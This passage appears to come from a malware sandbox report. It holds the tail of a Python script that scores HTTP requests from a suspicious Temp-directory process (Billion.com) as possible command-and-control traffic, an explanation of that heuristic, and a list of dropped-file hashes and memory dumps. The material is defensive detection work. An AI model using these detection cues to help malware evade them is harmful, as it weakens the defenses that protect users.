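CHROME_GET = """GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
"""

if __name__ == "__main__":
    for label, req, proc in [("t.me", T_ME_GET, "Billion.com"),
                             ("bijutr.shop", BIJUTR_POST, "Billion.com"),
                             ("ocsp", OCSP_GET, "Billion.com"),
                             ("control", CHROME_GET, "chrome.exe")]:
        print(label, assess(req, proc))
```

The process attribution matters: a Mac Opera User-Agent is unremarkable on its own, but from a .com file in the user's Temp directory on a Windows host, with none of the Accept headers a browser always sends, it is a strong signal. The OCSP request produces no findings, which is the intended behaviour; CryptoAPI traffic appears in nearly every TLS-using process and must not be treated as C2.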

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\680662\Billion.com

    Filesize

    925KB

    MD5

    62d09f076e6e0240548c2f837536a46a

    SHA1

    26bdbc63af8abae9a8fb6ec0913a307ef6614cf2

    SHA256

    1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

    SHA512

    32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • C:\Users\Admin\AppData\Local\Temp\680662\T

    Filesize

    283KB

    MD5

    aee70d72706e4448cd9bb63916c2fb70

    SHA1

    b1b973d61b3e8fb6e8c15a5096f3189307d436c9

    SHA256

    6fef118ae00bc96cd5d4e47c831a683342bd838c2cde5ca6a70c907a88f25e0f

    SHA512

    e74f1bcd95823a94a80f90624b98c57f1ac6d5ca7fe2f1fa2e62936882c66b19e804c5b93f040b15beb82a0a8c8de6125c7a4201838127b0a475778121ccb8df

  • C:\Users\Admin\AppData\Local\Temp\Alarm

    Filesize

    132KB

    MD5

    13a2635497f70d3d361cb002e767d98f

    SHA1

    1e87e1a3dce0f80f70f6cb94f0825c7a6a707325

    SHA256

    733d061aafb568c70df42cb730fd2077192ae87386d0a15cc029616f4e3bdc55

    SHA512

    27d9f84646b7ba6ac5c3323339b6cfc3a5798e01a9ea69de0d0048b1b06562de27a6e85568b26bdb059ef5c1bdc8ab287152b5b8355872a0ac90d1c2521654b5

  • C:\Users\Admin\AppData\Local\Temp\Ana

    Filesize

    81KB

    MD5

    e1172435d03594f9679fe60a14e30199

    SHA1

    20029de30935943707446474f606dde5f4cc49c7

    SHA256

    b4c00d09a27d96bf3f0963c09299a6c3b5839c151d2e49291299a749c189b95a

    SHA512

    ebff9ce05eb9cc7bab03ffcdf8f6f44b5df83849e53a93ef5f6843eda2bc1a38e651dfdbe14d1d9103b06fb77857b08958145c62413ad9ccacb96ea652c68961

  • C:\Users\Admin\AppData\Local\Temp\Assessing

    Filesize

    8KB

    MD5

    1a3d71246d4efca4aa005e013b7680cf

    SHA1

    a171887269f1f331eba1eb0084f3d5526aa89a52

    SHA256

    ca033ef4c6bae09e2b6492b881454409c962b89e1b5e7b8a59914eaa72daec45

    SHA512

    d413b8f9891a95b8483ad10ee7e20317db2d286b3806fcb407f9e1c592cd67e411d78f82b3efc8fd875a66276cf6c5d405425b3d7897ae59ae1c34e6ea88e052

  • C:\Users\Admin\AppData\Local\Temp\Biotechnology

    Filesize

    68KB

    MD5

    f0cf3a7260c8d6f7fed49ed8a8e2db62

    SHA1

    a526b2247d3ca5e94327f0e790a8b1c402604d15

    SHA256

    31c1246a4cfb9667f9c36ceac2b5060dc12eb871215a2452ffba709c783122bc

    SHA512

    dca64511b80d3c1d508b9a22bf92e8f07b209b867c55343e095423d59a90ca0a5a36fcdcd98c300e997850b64bec8046be1e8e150ca47809c951e1c0c032c5d4

  • C:\Users\Admin\AppData\Local\Temp\Compensation

    Filesize

    528B

    MD5

    8e1bfd84abbd93e396b7eb834370563f

    SHA1

    3f08086eb5c5c56202606cf98f3337c39c4fca63

    SHA256

    8a91ee541db819325e37068db7ec112d6713f1bdbbfb6599cc5f93409aafa8af

    SHA512

    add592639ae154dd30e3bd10149def542e15ed1644afe0228af2488e7aa0233adcd06aaae48e92741c383b23b8026d1c8be2b32687e65e07bd99b262296f07a8

  • C:\Users\Admin\AppData\Local\Temp\Enzyme

    Filesize

    89KB

    MD5

    e55e49c9c9654822ebcf66f646aa1807

    SHA1

    b43d0b12490073e8006c41019311c2bce71faf3a

    SHA256

    e3e47c5af4df600b306067ea0fb0edbde366da0adafbc4846259f0b8e193c868

    SHA512

    33e308d477bd5d99905cbc6dff527c360dd87a85d9854e992cb7779e27f4278c0cfe72cbd1068fe256ccb628f40e4c8918bb5199baea24408920cea3f6113a10

  • C:\Users\Admin\AppData\Local\Temp\Harvard

    Filesize

    70KB

    MD5

    cdd966e83ca5f20e6307375facf3d8df

    SHA1

    bff4dde0c3f4ddbea78f4c7046200f492c75b49f

    SHA256

    ab1f5070e1d6e92c6e6bf653119546f90abd9e91cffd248d2394e86588a8ffad

    SHA512

    cfccf7ff1e7b1fb4d3f7578ea4b21be0c07ac7a9d35e78feead9fe5bbdaad02285979fa999260c0ae9e694b0b36029f85f797c40ff0f5c190f8cd31818033f18

  • C:\Users\Admin\AppData\Local\Temp\Honey

    Filesize

    56KB

    MD5

    207bb64422a97810f4f806ba44b76725

    SHA1

    b9cce4855f79c9bafd56cb9025af4e12451ff1ae

    SHA256

    1f3f9acf2ef4473687e1e986406bb44fbdeffcff76ced7a034ecd3d2763187b0

    SHA512

    c6f1a4a20caca09f0249b8157897b3b8123129ceaee9c015f6fb3f2b39a57260510ad313cc8e4c01b458df512a223af8664cc40aed7788a20f3d5cd16e615e2f

  • C:\Users\Admin\AppData\Local\Temp\Hotels

    Filesize

    59KB

    MD5

    ffb68ff89889e9965e528019d1e976f1

    SHA1

    7d285b29e9dc3c954a64479efdc3b554c89ec988

    SHA256

    9a55913d254693465e5013c2cb36c4e09b04cf00a3c39c14e5e21a61abe311a9

    SHA512

    d10a74acd3dcd99312213cb7d167dc3f0dfaaae0cf66cabd721762411d2901d181de9558677621be173cfe7e0827de936b9ee9e618cb6cdd7d6f70fed1b3e782

  • C:\Users\Admin\AppData\Local\Temp\Imported

    Filesize

    110KB

    MD5

    e31c33dbe20b6a1dd992687a23959a12

    SHA1

    03f272995cb57cf0189367cb60ba718daf6310e5

    SHA256

    a238084b94293c59a4dbf0b8748b3241d859355269ef7b4daafc6cd26f8033e9

    SHA512

    5240e18828a76991d1946330bf40a8306cc3db8a11736f3d380c2855acc16537e27571172c9e8b03d13fedc9b7da3289f414a040398b7d10344286e1f7c32973

  • C:\Users\Admin\AppData\Local\Temp\Inside

    Filesize

    101KB

    MD5

    d8f5eaf8f6342d4f4d85503ca4d301ef

    SHA1

    3ba8b23cab4afb7558dae86e36cd99e34302a96b

    SHA256

    aa9cd7a25b03d039a8cd442097b57815e3325bf581bb5061fe8d97f1151b825f

    SHA512

    6ee44a9776030d0e5c63b124cca4e06b5c04fd32fdd6ba9537d59a9cd8159a846897679683c91e24d62e59bb50225267e9084c6144a5e4ce54b2f38462595352

  • C:\Users\Admin\AppData\Local\Temp\Investigations

    Filesize

    67KB

    MD5

    af0ab424e8eedebaad067b7858fea8e8

    SHA1

    60ba0052cdadc2466a1749f97db3dbab5e9251c4

    SHA256

    9e06aecf3d87ebe1db7cced2e5ba280c90d474146a439ef5f2ddb9bee70d56ad

    SHA512

    b2455143eec881ffbdfe29ecba5c26634c3d5dabdb02018c4d4ece6060ebf56a6facb1280a349577af51b7fe85199d33a922a24eff321106fd9dd308c2349a8f

  • C:\Users\Admin\AppData\Local\Temp\Managed

    Filesize

    91KB

    MD5

    9e321dfcce426649c3d616e4e2b75c1d

    SHA1

    02734ebec30a12bfd88bdd050e9ecaa61afee74c

    SHA256

    df97aff410243492a1699143e47d56dcac03f6d75a8ef1b260230da19c43cc52

    SHA512

    9ef758a2a5cec9d0d546a4926b05c99a0ee092ac5dcd8dd1642e5ecf1368ff7197c67cf057d0df0c22ced8be19863be9e3bbc09cb6d54b3dfe636948938acaad

  • C:\Users\Admin\AppData\Local\Temp\Memo

    Filesize

    478KB

    MD5

    6366e6809399935ddf2c3b586966a6ad

    SHA1

    9e4ba3de989dbd0320e9fa1ad58e2dd1f4054e39

    SHA256

    cf8c686a8b0f8c2e5f0df3f21285eafb5967099b0bc7e3656d9cee0ba121014f

    SHA512

    5c7b1373ceb3b2431f26881174f123bfbaf4b97cefed5dcc2c9f891ddf55b27d5280aa7663ee2603bd5a3d2c0240589c11aff4eae8cae731ddedbaef711d4049

  • C:\Users\Admin\AppData\Local\Temp\Modules

    Filesize

    50KB

    MD5

    4ed0758aab64693c1223b86f38e29881

    SHA1

    b0e66408119fa1e9445cd1d96e3bf24f2143640e

    SHA256

    20475df0585b1246382ee087041588a7bc19b50f0215918cc6e75a0490080358

    SHA512

    9d56b1ee3ee441a5e26983e000f93d8f494ae75fac42c1802578f3b101d35a969974a181c2fec22e7ca222d62c2ff2a3283ca4c2e792f0c878894fb663962fa2

  • C:\Users\Admin\AppData\Local\Temp\Pursuit

    Filesize

    56KB

    MD5

    0327acd88e3da1b11d3762f0af700392

    SHA1

    c8528d2ab7016a043212dc77c734683e9e261c34

    SHA256

    a1525c0bb5dfb6e70f0fa5f5dd46ee4caf1b9705699c41802337b5967e57a352

    SHA512

    8639ce459611fc817b4897ea92586c4d57ebcada4efd577dce2048a2f59e3683715f04d75ef4a802b2f40c02eeb7144548cccfa33cc61aed27c75b5776dd8994

  • C:\Users\Admin\AppData\Local\Temp\Seats

    Filesize

    100KB

    MD5

    56a58cde1e92c2fb8573d592c7d02589

    SHA1

    08e057abf8985d0a68a358b38148c5c553021670

    SHA256

    80efd8cf4bdf20ba34e33607019ac6886e11b6a7ee23497808fe4800ca1eff6c

    SHA512

    dd2d469fc86e6ffddde67d093d9673b2a2cc685e95bfe52c0bce73c93ab63d4dadce55110faedd4e09a3a01678a3317c2f0982a871617ac9cb0ded8b79b7ea92

  • C:\Users\Admin\AppData\Local\Temp\Shipping

    Filesize

    77KB

    MD5

    8f98428de673ad45cda24eec4fbae1ef

    SHA1

    89d66ef54b642cc8a4f11f25b803869771c22ad3

    SHA256

    5e29a9d0e92213d14820e4ea8c1b7b62ee1fc8d2221886c73af71f741122694a

    SHA512

    9dd83124240fa66eadcab214a14c43946cfa392171708ca199fcd5378e860252ea9076c175c855b6b0db3c628338e5e0e8c5fb9fca30e42197b9ebd3cefc526c

  • memory/60-68-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-70-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-69-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-72-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-73-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-71-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-80-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB

  • memory/60-81-0x00000000001D0000-0x0000000000409000-memory.dmp

    Filesize

    2.2MB
